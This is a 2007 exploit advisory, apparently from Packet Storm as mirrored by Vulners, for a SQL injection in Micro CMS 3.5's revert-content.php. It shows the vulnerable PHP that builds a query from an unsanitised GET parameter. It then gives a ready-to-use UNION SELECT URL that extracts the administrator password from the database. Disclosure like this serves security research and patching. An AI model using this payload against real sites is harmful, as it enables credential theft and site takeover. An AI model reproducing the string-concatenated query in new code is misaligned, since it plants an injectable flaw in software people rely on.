Lucene search
K

microcms-sql.txt

🗓️ 28 Aug 2007 00:00:00Reported by IHTeamType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 26 Views

Micro CMS 3.5 SQL Injection in revert-content.ph

Code
`#########################################################################################  
#  
# not sec group  
# http://www.notsec.com [email protected]  
#  
# [Micro CMS 3.5]  
#  
# Class: SQL Injection  
# Found: 28/08/2007  
# Remote: Yes  
# Site:  
http://www.impliedbydesign.com/ibd-micro-cms-static-content-manager.html  
# Download: http://www.impliedbydesign.com/apps/microcms/microcms.zip  
# Demo site:  
http://www.impliedbydesign.com/micro-cms-content-management-demo.php  
#  
#########################################################################################  
  
  
Vulnerable code:  
cms/revert-content.php  
============================================================================================================  
$sql = ' SELECT *  
FROM microcms_content_blurb_history  
WHERE content_blurbs_variable = "' . $_GET['id'] . '"  
ORDER BY content_blurb_history_version_num DESC  
LIMIT 1';  
$result = mysql_query($sql);  
============================================================================================================  
  
  
Exploit :  
============================================================================================================================================================================================  
http://site.com/[micro_cms]/cms/revert-content.php?type=newest&id=1%22%20UNION%20ALL%20SELECT%20null,null,SUBSTRING(administrators_pass,1,16),null,null%20FROM%20microcms_administrators/*  
============================================================================================================================================================================================  
  
  
Thanks To:  
=========================  
All notsec.com members;  
White_Sheep for Bugs Hunter;  
=========================  
# notsec.com  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

28 Aug 2007 00:00Current
7.4High risk
Vulners AI Score7.4
26